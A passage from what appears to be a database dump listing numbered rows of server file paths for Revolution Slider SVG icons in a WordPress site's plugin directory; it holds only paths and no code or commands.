tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_24px.svg'),(3182,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_fish_eye_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_fish_eye_24px.svg'),(3183,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_horizontal_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_horizontal_24px.svg'),(3184,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_vertical_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_vertical_24px.svg'),(3185,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_wide_angle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_wide_angle_24px.svg'),(3186,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_24px.svg'),(3187,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_album_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_album_24px.svg'),(3188,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_camera_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_camera_24px.svg'),(3189,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_filter_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_filter_24px.svg'),(3190,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_library_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_library_24px.svg'),(3191,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_actual_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_actual_24px.svg'),(3192,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_large_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_large_24px.svg'),(3193,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_small_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_small_24px.svg'),(3194,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_picture_as_pdf_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_picture_as_pdf_24px.svg'),(3195,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_portrait_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_portrait_24px.svg'),(3196,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_remove_red_eye_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_remove_red_eye_24px.svg'),(3197,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_90_degrees_ccw_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_90_degrees_ccw_24px.svg'),(3198,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_left_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_left_24px.svg'),(3199,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_right_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_rotate_right_24px.svg'),(3200,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_slideshow_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_slideshow_24px.svg'),(3201,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_straighten_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_straighten_24px.svg'),(3202,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_style_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_style_24px.svg'),(3203,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_camera_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_camera_24px.svg'),(3204,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_video_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_switch_video_24px.svg'),(3205,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tag_faces_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tag_faces_24px.svg'),(3206,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_texture_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_texture_24px.svg'),(3207,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timelapse_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timelapse_24px.svg'),(3208,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_10_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_10_24px.svg'),(3209,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_24px.svg'),(3210,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_3_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_3_24px.svg'),(3211,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_off_24px.svg'),(3212,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tonality_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tonality_24px.svg'),(3213,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_transform_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_transform_24px.svg'),(3214,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tune_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tune_24px.svg'),(3215,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_comfy_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_comfy_24px.svg'),(3216,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_compact_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_view_compact_24px.svg'),(3217,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_vignette_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_vignette_24px.svg'),(3218,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_auto_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_auto_24px.svg'),(3219,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_cloudy_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_cloudy_24px.svg'),(3220,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_incandescent_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_incandescent_24px.svg'),(3221,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_iridescent_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_iridescent_24px.svg'),(3222,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_sunny_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_sunny_24px.svg'),(3223,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/index.php','wp-content/plugins/revslider/public/assets/assets/svg/index.php'),(3224,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_add_location_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_add_location_24px.svg'),(3225,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_beenhere_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_beenhere_24px.svg'),(3226,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_24px.svg'),(3227,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bike_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bike_24px.svg'),(3228,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_boat_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_boat_24px.svg'),(3229,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bus_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_bus_24px.svg'),(3230,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_car_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_car_24px.svg'),(3231,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_railway_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_railway_24px.svg'),(3232,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_run_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_run_24px.svg'),(3233,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_subway_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_subway_24px.svg'),(3234,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_transit_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_transit_24px.svg'),(3235,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_walk_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_directions_walk_24px.svg'),(3236,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_edit_location_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_edit_location_24px.svg'),(3237,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_flight_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_flight_24px.svg'),(3238,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_hotel_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_hotel_24px.svg'),(3239,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_24px.svg'),(3240,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_clear_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_layers_clear_24px.svg'),(3241,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_activity_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_activity_24px.svg'),(3242,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_airport_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_airport_24px.svg'),(3243,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_atm_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_atm_24px.svg'),(3244,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_bar_24px.svg'),(3245,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_cafe_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_cafe_24px.svg'),(3246,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_car_wash_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_car_wash_24px.svg'),(3247,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_convenience_store_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_convenience_store_24px.svg'),(3248,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_dining_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_dining_24px.svg'),(3249,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_drink_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_drink_24px.svg'),(3250,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_florist_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_florist_24px.svg'),(3251,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_gas_station_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_gas_station_24px.svg'),(3252,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_grocery_store_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_grocery_store_24px.svg'),(3253,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_hospital_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_hospital_24px.svg'),(3254,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_hotel_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_hotel_24px.svg'),(3255,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_laundry_service_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_laundry_service_24px.svg'),(3256,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_library_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_library_24px.svg'),(3257,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_mall_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_mall_24px.svg'),(3258,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_movies_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_movies_24px.svg'),(3259,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_offer_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_offer_24px.svg'),(3260,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_parking_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_parking_24px.svg'),(3261,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_pharmacy_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_pharmacy_24px.svg'),(3262,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_phone_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_phone_24px.svg'),(3263,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_pizza_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_pizza_24px.svg'),(3264,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_play_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_play_24px.svg'),(3265,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_post_office_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_post_office_24px.svg'),(3266,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_printshop_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_printshop_24px.svg'),(3267,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_see_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_see_24px.svg'),(3268,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_shipping_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_shipping_24px.svg'),(3269,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_taxi_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_taxi_24px.svg'),(3270,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_map_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_map_24px.svg'),(3271,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_my_location_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_my_location_24px.svg'),(3272,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_navigation_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_navigation_24px.svg'),(3273,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_near_me_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_near_me_24px.svg'),(3274,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_24px.svg'),(3275,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_circle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_circle_24px.svg'),(3276,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_pin_drop_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_pin_drop_24px.svg'),(3277,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_place_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_place_24px.svg'),(3278,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_rate_review_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_rate_review_24px.svg'),(3279,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_restaurant_menu_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_restaurant_menu_24px.svg'),(3280,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_satellite_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_satellite_24px.svg'),(3281,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_store_mall_directory_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_store_mall_directory_24px.svg'),(3282,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_terrain_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_terrain_24px.svg'),(3283,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_traffic_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_traffic_24px.svg'),(3284,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_zoom_out_map_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_zoom_out_map_24px.svg'),(3285,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_24px.svg'),(3286,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_36px.svg'),(3287,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_24px.svg'),(3288,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_back_36px.svg'),(3289,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_downward_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_downward_24px.svg'),(3290,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_24px.svg'),(3291,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_36px.svg'),(3292,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_circle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_down_circle_24px.svg'),(3293,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_up_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_up_24px.svg'),(3294,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_up_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_drop_up_36px.svg'),(3295,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_forward_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_forward_24px.svg'),(3296,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_forward_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_forward_36px.svg'),(3297,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_upward_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_arrow_upward_24px.svg'),(3298,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_24px.svg'),(3299,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_cancel_36px.svg'),(3300,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_24px.svg'),(3301,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_check_36px.svg'),(3302,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_24px.svg'),(3303,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_left_36px.svg'),(3304,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_24px.svg'),(3305,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_chevron_right_36px.svg'),(3306,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_24px.svg'),(3307,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_36px.svg'),(3308,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_24px.svg'),(3309,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_less_36px.svg'),(3310,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_more_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_more_24px.svg'),(3311,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_more_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_expand_more_36px.svg'),(3312,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_24px.svg'),(3313,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_36px.svg'),(3314,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_24px.svg'),(3315,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_exit_36px.svg'),(3316,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_24px.svg'),(3317,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_menu_36px.svg'),(3318,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_horiz_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_horiz_24px.svg'),(3319,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_more_horiz_36px.svg','wp-content/plugins/revslider/public/assets/assets/svg/navigati